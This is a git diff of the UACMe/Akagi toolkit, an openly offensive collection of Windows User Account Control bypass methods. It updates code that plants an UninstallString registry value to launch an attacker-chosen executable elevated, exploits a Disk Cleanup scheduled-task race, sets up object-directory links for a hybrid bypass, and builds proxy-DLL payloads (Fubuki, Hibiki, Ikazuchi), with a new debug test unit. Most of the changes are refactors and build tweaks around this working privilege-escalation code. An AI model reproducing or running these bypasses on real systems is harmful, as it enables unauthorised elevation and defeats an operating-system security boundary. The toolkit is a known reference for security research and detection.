diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index f395357..53bd2bf 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index accfab9..86bb07c 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/Compiled/UacInfo64.exe b/Compiled/UacInfo64.exe
index 79c9649..65abf59 100644
Binary files a/Compiled/UacInfo64.exe and b/Compiled/UacInfo64.exe differ
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index facefd9..d8b0ee4 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/bin/Ikazuchi32.cd b/Source/Akagi/bin/Ikazuchi32.cd
index 97714ea..83a5920 100644
Binary files a/Source/Akagi/bin/Ikazuchi32.cd and b/Source/Akagi/bin/Ikazuchi32.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi64.cd b/Source/Akagi/bin/Ikazuchi64.cd
index 8950769..757c627 100644
Binary files a/Source/Akagi/bin/Ikazuchi64.cd and b/Source/Akagi/bin/Ikazuchi64.cd differ
diff --git a/Source/Akagi/bin/fubuki32.cd b/Source/Akagi/bin/fubuki32.cd
index 3d1e5ba..d34f37d 100644
Binary files a/Source/Akagi/bin/fubuki32.cd and b/Source/Akagi/bin/fubuki32.cd differ
diff --git a/Source/Akagi/bin/fubuki64.cd b/Source/Akagi/bin/fubuki64.cd
index e3b693e..d0b532f 100644
Binary files a/Source/Akagi/bin/fubuki64.cd and b/Source/Akagi/bin/fubuki64.cd differ
diff --git a/Source/Akagi/bin/hibiki32.cd b/Source/Akagi/bin/hibiki32.cd
index 810558c..48b9b6b 100644
Binary files a/Source/Akagi/bin/hibiki32.cd and b/Source/Akagi/bin/hibiki32.cd differ
diff --git a/Source/Akagi/bin/hibiki64.cd b/Source/Akagi/bin/hibiki64.cd
index 0e13bbf..ef6996f 100644
Binary files a/Source/Akagi/bin/hibiki64.cd and b/Source/Akagi/bin/hibiki64.cd differ
diff --git a/Source/Akagi/comet.h b/Source/Akagi/comet.h
index 1bd3967..eb2b6f4 100644
--- a/Source/Akagi/comet.h
+++ b/Source/Akagi/comet.h
@@ -4,9 +4,9 @@
*
* TITLE: COMET.H
*
-* VERSION: 2.52
+* VERSION: 2.57
*
-* DATE: 17 Jan 2017
+* DATE: 07 Mar 2017
*
* Prototypes and definitions for Comet method.
*
@@ -19,5 +19,5 @@
#pragma once
BOOL ucmCometMethod(
- LPWSTR lpszPayload
+ _In_ LPWSTR lpszPayload
);
diff --git a/Source/Akagi/compress.c b/Source/Akagi/compress.c
index 60a9e87..d27735b 100644
--- a/Source/Akagi/compress.c
+++ b/Source/Akagi/compress.c
@@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 15 Feb 2017
+* DATE: 01 Mar 2017
*
* Compression support.
*
@@ -75,6 +75,12 @@ PUCHAR DecompressBufferLZNT1(
PUCHAR UncompBuffer = NULL;
NTSTATUS status;
+ if (FinalUncompressedSize)
+ *FinalUncompressedSize = 0;
+
+ if (UncompressedBufferSize == 0)
+ return NULL;
+
UncompBuffer = (PUCHAR)VirtualAlloc(NULL, UncompressedBufferSize,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
diff --git a/Source/Akagi/enigma0x3.c b/Source/Akagi/enigma0x3.c
index 1095aa7..783a649 100644
--- a/Source/Akagi/enigma0x3.c
+++ b/Source/Akagi/enigma0x3.c
@@ -4,7 +4,7 @@
*
* TITLE: ENIGMA0X3.C
*
-* VERSION: 2.54
+* VERSION: 2.57
*
* DATE: 07 Feb 2017
*
@@ -256,9 +256,10 @@ BOOL ucmDiskCleanupRaceCondition(
shinfo.lpParameters = T_SCHTASKS_CMD;
shinfo.nShow = SW_SHOW;
if (ShellExecuteExW(&shinfo)) {
- if (shinfo.hProcess)
+ if (shinfo.hProcess != NULL) {
WaitForSingleObject(shinfo.hProcess, INFINITE);
CloseHandle(shinfo.hProcess);
+ }
}
//
// Because cleanmgr.exe is slow we need to wait enough time until it will try to launch dismhost.exe
diff --git a/Source/Akagi/explife.c b/Source/Akagi/explife.c
index 10c29c9..a0c12da 100644
--- a/Source/Akagi/explife.c
+++ b/Source/Akagi/explife.c
@@ -4,9 +4,9 @@
*
* TITLE: EXPLIFE.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 14 Feb 2017
+* DATE: 07 Mar 2017
*
* ExpLife UAC bypass using IARPUninstallStringLauncher.
* For description please visit original URL
@@ -100,22 +100,23 @@ BOOL ucmUninstallLauncherMethod(
break;
_strcpy(szKeyName, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
- StringFromGUID2(&guid, szGuid, sizeof(szGuid));
- _strcat(szKeyName, szGuid);
+ if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
+ _strcat(szKeyName, szGuid);
- lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
- szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
+ lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
+ szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
- if (lResult != ERROR_SUCCESS)
- break;
+ if (lResult != ERROR_SUCCESS)
+ break;
- lResult = RegSetValueEx(hKey, L"UninstallString", 0, REG_SZ, (BYTE*)lpszExecutable,
- (DWORD)(_strlen(lpszExecutable) * sizeof(WCHAR)));
+ lResult = RegSetValueEx(hKey, L"UninstallString", 0, REG_SZ, (BYTE*)lpszExecutable,
+ (DWORD)(_strlen(lpszExecutable) * sizeof(WCHAR)));
- if (lResult != ERROR_SUCCESS)
- break;
+ if (lResult != ERROR_SUCCESS)
+ break;
- bResult = ucmMasqueradedAPRLaunchFile(szGuid);
+ bResult = ucmMasqueradedAPRLaunchFile(szGuid);
+ }
} while (bCond);
diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h
index 94b45aa..414898f 100644
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
-* VERSION: 2.55
+* VERSION: 2.57
*
-* DATE: 10 Feb 2017
+* DATE: 28 Feb 2017
*
* Common header file for the program support routines.
*
@@ -79,6 +79,9 @@ typedef enum _UACBYPASSMETHOD {
UacMethodEnigma0x3,
UacMethodEnigma0x3_2,
UacMethodExpLife,
+#ifdef _DEBUG
+ UacMethodTest,
+#endif
UacMethodMax
} UACBYPASSMETHOD;
@@ -101,6 +104,7 @@ typedef enum _UACBYPASSMETHOD {
#include "hybrids.h"
#include "comet.h"
#include "enigma0x3.h"
+#include "tests\test.h"
//default execution flow
#define AKAGI_FLAG_KILO 0
diff --git a/Source/Akagi/hybrids.c b/Source/Akagi/hybrids.c
index 14a5d06..6e1e9e9 100644
--- a/Source/Akagi/hybrids.c
+++ b/Source/Akagi/hybrids.c
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 15 Feb 2017
+* DATE: 01 Mar 2017
*
* Hybrid UAC bypass methods.
*
@@ -1197,12 +1197,18 @@ BOOL ucmSetupAkagiLink(
lpUser = _filename(usKey.Buffer);
+ ParentRoot.Buffer = NULL;
+ ParentRoot.Length = 0;
+ ParentRoot.MaximumLength = 0;
RtlInitUnicodeString(&ParentRoot, L"\\Rpc Control\\Akagi");
InitializeObjectAttributes(&attr, &ParentRoot, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateDirectoryObject(&hRoot, DIRECTORY_CREATE_SUBDIRECTORY, &attr);
if (!NT_SUCCESS(status))
break;
+ ChildName.Buffer = NULL;
+ ChildName.Length = 0;
+ ChildName.MaximumLength = 0;
RtlInitUnicodeString(&ChildName, lpUser);
attr.RootDirectory = hRoot;
attr.ObjectName = &ChildName;
diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c
index 4c1bb3d..a8be1f1 100644
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 13 Feb 2017
+* DATE: 28 Feb 2017
*
* Program entry point.
*
@@ -850,6 +850,11 @@ UINT ucmMain()
return ERROR_SUCCESS;
}
break;
+#ifdef _DEBUG
+ case UacMethodTest:
+ UACMeTest();
+ break;
+#endif
}
return ERROR_ACCESS_DENIED;
@@ -902,6 +907,7 @@ VOID main()
uctx.ucmMain = (pfnEntryPoint)ucmMain;
RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
+#pragma warning(suppress: 28159)
k = ~GetTickCount();
g_ExCookie = RtlRandomEx(&k);
diff --git a/Source/Akagi/sirefef.h b/Source/Akagi/sirefef.h
index 3a1b0af..e9c01a9 100644
--- a/Source/Akagi/sirefef.h
+++ b/Source/Akagi/sirefef.h
@@ -4,9 +4,9 @@
*
* TITLE: SIREFEF.H
*
-* VERSION: 2.53
+* VERSION: 2.57
*
-* DATE: 18 Jan 2017
+* DATE: 01 Mar 2017
*
* Prototypes and definitions for Sirefef/ZeroAccess method.
*
@@ -57,6 +57,7 @@ typedef HANDLE(NTAPI *pfnCreateRemoteThread)(
_Out_opt_ LPDWORD lpThreadId
);
+#pragma warning(suppress: 28301)
typedef DWORD(WINAPI *pfnWaitForSingleObject)(
_In_ HANDLE hHandle,
_In_ DWORD dwMilliseconds
diff --git a/Source/Akagi/tests/test.c b/Source/Akagi/tests/test.c
new file mode 100644
index 0000000..2bc62a2
--- /dev/null
+++ b/Source/Akagi/tests/test.c
@@ -0,0 +1,190 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: TEST.C
+*
+* VERSION: 2.57
+*
+* DATE: 28 Feb 2017
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+
+#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
+#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
+
+#define T_AKAGI_KEY L"Software\\Akagi"
+#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
+
+
+typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+
+typedef struct _OBJSCANPARAM {
+ PWSTR Buffer;
+ SIZE_T BufferSize;
+} OBJSCANPARAM, *POBJSCANPARAM;
+
+/*
+* supEnumSystemObjects
+*
+* Purpose:
+*
+* Lookup object by name in given directory.
+*
+*/
+NTSTATUS NTAPI supEnumSystemObjects(
+ _In_opt_ LPWSTR pwszRootDirectory,
+ _In_opt_ HANDLE hRootDirectory,
+ _In_ PENUMOBJECTSCALLBACK CallbackProc,
+ _In_opt_ PVOID CallbackParam
+)
+{
+ BOOL cond = TRUE;
+ ULONG ctx, rlen;
+ HANDLE hDirectory = NULL;
+ NTSTATUS status;
+ NTSTATUS CallbackStatus;
+ OBJECT_ATTRIBUTES attr;
+ UNICODE_STRING sname;
+
+ POBJECT_DIRECTORY_INFORMATION objinf;
+
+ if (CallbackProc == NULL) {
+ return STATUS_INVALID_PARAMETER_4;
+ }
+
+ status = STATUS_UNSUCCESSFUL;
+
+ // We can use root directory.
+ if (pwszRootDirectory != NULL) {
+ RtlSecureZeroMemory(&sname, sizeof(sname));
+ RtlInitUnicodeString(&sname, pwszRootDirectory);
+ InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
+ if (!NT_SUCCESS(status)) {
+ return status;
+ }
+ }
+ else {
+ if (hRootDirectory == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+ hDirectory = hRootDirectory;
+ }
+
+ // Enumerate objects in directory.
+ ctx = 0;
+ do {
+
+ rlen = 0;
+ status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
+ if (status != STATUS_BUFFER_TOO_SMALL)
+ break;
+
+ objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
+ if (objinf == NULL)
+ break;
+
+ status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
+ if (!NT_SUCCESS(status)) {
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+ break;
+ }
+
+ CallbackStatus = CallbackProc(objinf, CallbackParam);
+
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+
+ if (NT_SUCCESS(CallbackStatus)) {
+ status = STATUS_SUCCESS;
+ break;
+ }
+
+ } while (cond);
+
+ if (hDirectory != NULL) {
+ NtClose(hDirectory);
+ }
+ return status;
+}
+
+/*
+* supDetectObjectCallback
+*
+* Purpose:
+*
+* Comparer callback routine used in objects enumeration.
+*
+*/
+NTSTATUS NTAPI supDetectObjectCallback(
+ _In_ POBJECT_DIRECTORY_INFORMATION Entry,
+ _In_ PVOID CallbackParam
+)
+{
+ SIZE_T BufferSize;
+ POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
+
+ if (Entry == NULL) {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ if (CallbackParam == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+
+ if (Entry->Name.Buffer) {
+
+ BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
+ Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
+ if (Param->Buffer) {
+ Param->BufferSize = BufferSize;
+ _strncpy(
+ Param->Buffer, Param->BufferSize / sizeof(WCHAR),
+ Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
+ );
+ return STATUS_SUCCESS;
+ }
+ }
+ return STATUS_UNSUCCESSFUL;
+}
+
+
+VOID UACMeTest()
+{
+ OBJSCANPARAM Param;
+ NTSTATUS status;
+ LPWSTR lpszParamKey = NULL;
+ SIZE_T memIO;
+
+ ucmSetupAkagiLink();
+
+ Param.Buffer = NULL;
+ Param.BufferSize = 0;
+
+ status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
+ supDetectObjectCallback, &Param);
+ if (!NT_SUCCESS(status))
+ return;
+
+
+ if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
+ return;
+
+ memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
+ lpszParamKey = RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, memIO);
+ if (lpszParamKey == NULL)
+ return;
+
+ _strcpy_w(lpszParamKey, T_REGISTRY_USER);
+ _strcat_w(lpszParamKey, Param.Buffer);
+ _strcat_w(lpszParamKey, L"\\");
+ _strcat_w(lpszParamKey, T_AKAGI_KEY);
+
+}
diff --git a/Source/Akagi/tests/test.h b/Source/Akagi/tests/test.h
new file mode 100644
index 0000000..27b9c63
--- /dev/null
+++ b/Source/Akagi/tests/test.h
@@ -0,0 +1,95 @@
+#/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: TEST.H
+*
+* VERSION: 2.57
+*
+* DATE: 28 Feb 2017
+*
+* Test unit header file.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+typedef interface ITestInterface ITestInterface;
+
+typedef struct ITestInterfaceVtbl {
+
+ BEGIN_INTERFACE
+
+ HRESULT(STDMETHODCALLTYPE *QueryInterface)(
+ __RPC__in ITestInterface * This,
+ __RPC__in REFIID riid,
+ _COM_Outptr_ void **ppvObject);
+
+ ULONG(STDMETHODCALLTYPE *AddRef)(
+ __RPC__in ITestInterface * This);
+
+ ULONG(STDMETHODCALLTYPE *Release)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method1)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method2)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method3)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method4)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method5)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method6)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method7)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method8)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method9)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method10)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method11)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method12)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method13)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method14)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method15)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method16)(
+ __RPC__in ITestInterface * This);
+ END_INTERFACE
+
+} *PITestInterfaceVtbl;
+
+interface ITestInterface
+{
+ CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;
+};
+
+
+VOID UACMeTest();
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index cede2a3..f078bda 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -85,7 +85,7 @@
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
- SecurityRules.ruleset
+ AllRules.ruleset
$(ProjectName)32
true
@@ -94,7 +94,7 @@
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
true
@@ -106,6 +106,7 @@
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
false
+ $(ProjectDir)
Windows
@@ -132,6 +133,7 @@
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
false
+ $(ProjectDir)
Windows
@@ -167,6 +169,7 @@
true
+ $(ProjectDir)
Windows
@@ -207,6 +210,7 @@
true
+ $(ProjectDir)
Windows
@@ -258,6 +262,7 @@
+
@@ -280,6 +285,7 @@
+
diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters
index 6373b4d..bebea7f 100644
--- a/Source/Akagi/uacme.vcxproj.filters
+++ b/Source/Akagi/uacme.vcxproj.filters
@@ -16,6 +16,9 @@
{1caf2f34-af91-46be-aa2e-1893b0be628c}
+
+ {c4fc1dcf-e216-4458-a377-e7203d627128}
+
@@ -99,6 +102,9 @@
minirtl
+
+ testunits
+
@@ -161,6 +167,9 @@
minirtl
+
+ testunits
+
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index ba01da1..cdde024 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -1,19 +1,19 @@
- 4
+ 28
WindowsLocalDebugger
- 10
+ 28
WindowsLocalDebugger
- 26
+ 22
WindowsLocalDebugger
- 16
+ 22
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Fubuki/dll.vcxproj b/Source/Fubuki/dll.vcxproj
index 719a873..fa7305c 100644
--- a/Source/Fubuki/dll.vcxproj
+++ b/Source/Fubuki/dll.vcxproj
@@ -74,6 +74,7 @@
false
SecurityRules.ruleset
$(ProjectName)32
+ false
true
@@ -81,20 +82,23 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
+ false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
true
- SecurityRules.ruleset
+ AllRules.ruleset
$(ProjectName)32
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
@@ -112,6 +116,7 @@
false
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -135,6 +140,7 @@
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -163,6 +169,7 @@
false
CompileAsC
None
+ $(SolutionDir)
Windows
@@ -178,6 +185,9 @@
No
UseLinkTimeCodeGeneration
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki32.dll
+
@@ -193,6 +203,7 @@
true
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -205,6 +216,9 @@
export.def
Shell32.lib;%(AdditionalDependencies)
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki64.dll
+
diff --git a/Source/Fubuki/dllmain.c b/Source/Fubuki/dllmain.c
index aab3d6a..1f0c45b 100644
--- a/Source/Fubuki/dllmain.c
+++ b/Source/Fubuki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.53
+* VERSION: 2.57
*
-* DATE: 18 Jan 2017
+* DATE: 03 Mar 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@@ -29,9 +29,9 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include
-#include "..\Shared\ntos.h"
+#include "shared\ntos.h"
#include
-#include "..\shared\minirtl.h"
+#include "shared\minirtl.h"
#include "unbcl.h"
#include "wbemcomn.h"
diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc
index e099b54..93a1487 100644
Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ
diff --git a/Source/Hibiki/Hibiki.vcxproj b/Source/Hibiki/Hibiki.vcxproj
index 61217f1..af8bb32 100644
--- a/Source/Hibiki/Hibiki.vcxproj
+++ b/Source/Hibiki/Hibiki.vcxproj
@@ -72,6 +72,7 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
SecurityRules.ruleset
+ false
true
@@ -79,22 +80,25 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
- SecurityRules.ruleset
+ AllRules.ruleset
true
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
true
+ false
@@ -105,6 +109,7 @@
WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -114,6 +119,10 @@
DllMain
false
+
+
+
+
@@ -124,6 +133,7 @@
WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -133,6 +143,10 @@
DllMain
false
+
+
+
+
@@ -148,6 +162,7 @@
false
CompileAsC
true
+ $(SolutionDir)
Windows
@@ -160,6 +175,13 @@
true
false
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki32.dll
+
+
+
+
+
@@ -175,6 +197,7 @@
false
CompileAsC
true
+ $(SolutionDir)
Windows
@@ -187,6 +210,13 @@
true
false
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki64.dll
+
+
+
+
+
diff --git a/Source/Hibiki/dllmain.c b/Source/Hibiki/dllmain.c
index 40f1075..97c3730 100644
--- a/Source/Hibiki/dllmain.c
+++ b/Source/Hibiki/dllmain.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2016
+* (C) COPYRIGHT AUTHORS, 2014 - 2017
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.10
+* VERSION: 2.57
*
-* DATE: 14 Apr 2016
+* DATE: 07 Mar 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@@ -30,8 +30,8 @@
#include
#include
-#include "..\shared\ntos.h"
-#include "..\shared\minirtl.h"
+#include "shared\ntos.h"
+#include "shared\minirtl.h"
#if (_MSC_VER >= 1900)
diff --git a/Source/Hibiki/version.rc b/Source/Hibiki/version.rc
index 996f50c..ebac093 100644
Binary files a/Source/Hibiki/version.rc and b/Source/Hibiki/version.rc differ
diff --git a/Source/Ikazuchi/Ikazuchi.vcxproj b/Source/Ikazuchi/Ikazuchi.vcxproj
index 9712183..561e66b 100644
--- a/Source/Ikazuchi/Ikazuchi.vcxproj
+++ b/Source/Ikazuchi/Ikazuchi.vcxproj
@@ -75,6 +75,7 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
SecurityRules.ruleset
+ false
true
@@ -82,20 +83,23 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
@@ -109,6 +113,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -130,6 +135,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -154,6 +160,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -165,6 +172,9 @@
true
export.def
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.dll
+
@@ -181,6 +191,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -192,6 +203,9 @@
true
export.def
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.dll
+
diff --git a/Source/Ikazuchi/Ikazuchi.vcxproj.user b/Source/Ikazuchi/Ikazuchi.vcxproj.user
new file mode 100644
index 0000000..abe8dd8
--- /dev/null
+++ b/Source/Ikazuchi/Ikazuchi.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/Source/Ikazuchi/dllmain.c b/Source/Ikazuchi/dllmain.c
index 78db019..ac8241c 100644
--- a/Source/Ikazuchi/dllmain.c
+++ b/Source/Ikazuchi/dllmain.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.50
+* VERSION: 2.57
*
-* DATE: 07 July 2016
+* DATE: 07 Mar 2017
*
* Proxy dll entry point, Ikazuchi.
*
@@ -29,10 +29,10 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include
-#include "..\Shared\ntos.h"
+#include "shared\ntos.h"
#include
-#include "..\shared\minirtl.h"
-#include "..\Shared\_filename.h"
+#include "shared\minirtl.h"
+#include "shared\_filename.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@@ -43,16 +43,27 @@
#endif
#endif
-#define T_AKAGI_KEY L"Software\\Akagi"
-#define T_AKAGI_PARAM L"LoveLetter"
-#define COMCTL32_SXS L"microsoft.windows.common-controls"
-#define COMCTL32_DLL L"comctl32.dll"
+#define T_SXS_DIRECTORY L"\\\\?\\globalroot\\systemroot\\winsxs\\"
+#define SXS_DIRECTORY_LENGTH sizeof(T_SXS_DIRECTORY) - sizeof(WCHAR)
+
+#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
+#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
+
+#define T_AKAGI_KEY L"Software\\Akagi"
+#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
+
+#define T_COMCTL32_SLASH L"\\comctl32.dll"
+#define COMCTL32_SLASH_LENGTH sizeof(T_COMCTL32_SLASH) - sizeof(WCHAR)
+
+#define T_AKAGI_PARAM L"LoveLetter"
+#define COMCTL32_SXS L"microsoft.windows.common-controls"
+#define COMCTL32_DLL L"comctl32.dll"
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
- ULONG BufferSize;
+ SIZE_T BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
typedef struct _SXS_SEARCH_CONTEXT {
